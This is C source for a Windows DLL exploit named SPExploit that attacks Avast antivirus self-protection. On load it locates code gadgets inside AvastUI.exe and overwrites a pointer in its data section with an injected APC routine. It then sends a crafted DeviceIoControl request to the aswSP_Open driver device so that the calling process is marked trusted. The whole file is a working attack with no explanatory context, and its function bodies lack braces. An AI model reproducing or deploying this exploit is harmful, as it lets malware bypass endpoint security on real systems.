PBYTE memmem( PBYTE haystack, SIZE_T hlen, PBYTE needle, SIZE_T nlen )

    BYTE needle_first;

    PBYTE p = haystack;

    SIZE_T plen = hlen;

 

    if ( !nlen )

        return NULL;

 

    needle_first = *needle;

 

    while ( plen >= nlen && ( p = memchr( p, needle_first, plen - nlen + 1 ) ) )

    {

        if ( !memcmp( p, needle, nlen ) )

            return p;

 

        p++;

        plen = hlen - ( p - haystack );

    }

 

    return NULL;

 

BOOL GetSectionInfo( PBYTE pModule, PBYTE szSectionName, PBYTE *ppSection, PDWORD pdwSectionSize )

    PIMAGE_DOS_HEADER pDOSHeader;

    PIMAGE_NT_HEADERS pNTHeaders;

    PIMAGE_OPTIONAL_HEADER pOptionalHeader;

    PIMAGE_SECTION_HEADER pSectionHeader;

    UINT i;

 

    *ppSection = NULL;

    *pdwSectionSize = 0;

 

    pDOSHeader = ( PIMAGE_DOS_HEADER )pModule;

    if ( IMAGE_DOS_SIGNATURE != pDOSHeader->e_magic )

        return FALSE;

    pNTHeaders = ( PIMAGE_NT_HEADERS )( pModule + pDOSHeader->e_lfanew );

    if ( IMAGE_NT_SIGNATURE != pNTHeaders->Signature )

        return FALSE;

    pOptionalHeader = ( PIMAGE_OPTIONAL_HEADER )( &pNTHeaders->OptionalHeader );

    if ( IMAGE_NT_OPTIONAL_HDR_MAGIC != pOptionalHeader->Magic )

        return FALSE;

    pSectionHeader = ( PIMAGE_SECTION_HEADER )( ( PBYTE )pOptionalHeader + pNTHeaders->FileHeader.SizeOfOptionalHeader );

    for ( i = 0; i < pNTHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++ )

    {

        if ( strcmp( pSectionHeader->Name, szSectionName ) == 0 )

        {

            DWORD dwSize = pSectionHeader->Misc.VirtualSize;

 

            if ( dwSize % pOptionalHeader->SectionAlignment != 0 )

                dwSize += pOptionalHeader->SectionAlignment - ( dwSize % pOptionalHeader->SectionAlignment );

            *ppSection = pModule + pSectionHeader->VirtualAddress;

            *pdwSectionSize = dwSize;

            _tprintf( _T( "[?] %S: 0x%08Ix 0x%08x\n" ), pSectionHeader->Name, *ppSection, *pdwSectionSize );

 

            return TRUE;

        }

    }

 

    return FALSE;

 

static BYTE g_pbTrampoline[] = { 0x85, 0xc0, 0x74, 0x0e, 0x8d, 0x4d, 0xd0, 0x51, 0x6a, 0x03, 0xff, 0xd0 };

static BYTE g_pbInt3Return[] = { 0xcc, 0xc3 };

 

__declspec( naked ) DWORD UserModeAPCFunction( )

    __asm

    {

        //int 3

        mov eax, dword ptr [esp + 10h]

        test eax,eax

        jz skip

        mov dword ptr [eax], 41414141h

skip:

        xor eax,eax

        add esp, 0Ch

        ret

    }

 

VOID SPExploit( VOID )

    HMODULE hModule;

    HANDLE hDevice = INVALID_HANDLE_VALUE;

    TCHAR szDebug[0x40] = { 0 };

    DWORD dwPid, dwBytesReturned = 0, dwSectionSize = 0;

    BYTE pbBuffer[0x19] = { 0 };

    PBYTE pSection = NULL;

    DWORD_PTR dwpGadget[2] = { 0, 0 };

    PDWORD_PTR pdwpPointerInDataSection = NULL;

 

    hModule = GetModuleHandle( _T( "AvastUI.exe" ) );

    if ( NULL == hModule )

    {

        if ( SUCCEEDED( StringCchPrintf( szDebug, _countof( szDebug ),

                                         _T( "[-] GetModuleHandle() failed (0x%08x)\n" ),

                                         GetLastError() ) ) )

            OutputDebugString( szDebug );

        return;

    }

    if ( FALSE == GetSectionInfo( ( PBYTE )hModule, ".text", &pSection, &dwSectionSize ) )

    {

        OutputDebugString( _T( ".text section not found\n" ) );

        return;

    }

    dwpGadget[0] = ( DWORD_PTR )memmem( pSection, dwSectionSize, g_pbInt3Return, sizeof( g_pbInt3Return ) );

    dwpGadget[1] = ( DWORD_PTR )memmem( pSection, dwSectionSize, g_pbTrampoline, sizeof( g_pbTrampoline ) );

    dwpGadget[1] -= 5;

    pdwpPointerInDataSection = *( PDWORD_PTR * )( ( PBYTE )( dwpGadget[1] ) + 1 );

    *pdwpPointerInDataSection = ( DWORD_PTR )UserModeAPCFunction;

 

    hDevice = CreateFile( _T( "\\\\.\\aswSP_Open" ),

                          MAXIMUM_ALLOWED,

                          FILE_SHARE_READ | FILE_SHARE_WRITE,

                          NULL,

                          OPEN_EXISTING,

                          0,

                          NULL );

    if ( INVALID_HANDLE_VALUE == hDevice )

    {

        if ( SUCCEEDED( StringCchPrintf( szDebug, _countof( szDebug ),

                                         _T( "[-] CreateFile() failed (0x%08x)\n" ),

                                         GetLastError() ) ) )

            OutputDebugString( szDebug );

        return;

    }

    *( PDWORD )( &pbBuffer[0] ) = 0x7370746d;

    *( PDWORD )( &pbBuffer[4] ) = dwPid = GetCurrentProcessId();

    pbBuffer[8] = 1;

    *( PDWORD_PTR )( &pbBuffer[9] ) = dwpGadget[1];

    *( PDWORD )( &pbBuffer[0xd] ) = dwPid;

    *( PDWORD_PTR )( &pbBuffer[0x11] ) = dwpGadget[0]; //never used?

    *( PDWORD )( &pbBuffer[0x15] ) = dwPid;

    if ( FALSE == DeviceIoControl( hDevice,

                                   0xb2d60198,

                                   pbBuffer,

                                   sizeof( pbBuffer ),

                                   NULL,

                                   0,

                                   &dwBytesReturned,

                                   NULL ) )

    {

        if ( SUCCEEDED( StringCchPrintf( szDebug, _countof( szDebug ),

                                         _T( "[-] DeviceIoControl() failed (0x%08x)\n" ),

                                         GetLastError() ) ) )

            OutputDebugString( szDebug );

    }

 

    if ( SUCCEEDED( StringCchPrintf( szDebug, _countof( szDebug ),

                                     _T( "ProcessId %d should now be trusted!\n" ),

                                     dwPid ) ) )

        MessageBox( NULL, szDebug, _T( "SPExploit" ), MB_OK | MB_ICONINFORMATION );

 

    CloseHandle( hDevice );

    ExitProcess( 0 );

 

BOOL APIENTRY DllMain( HANDLE hinstDLL,

                       DWORD fdwReason,

                       LPVOID lpReserved )

    if ( fdwReason == DLL_PROCESS_ATTACH )

    {

        SPExploit();

    }    

    return TRUE;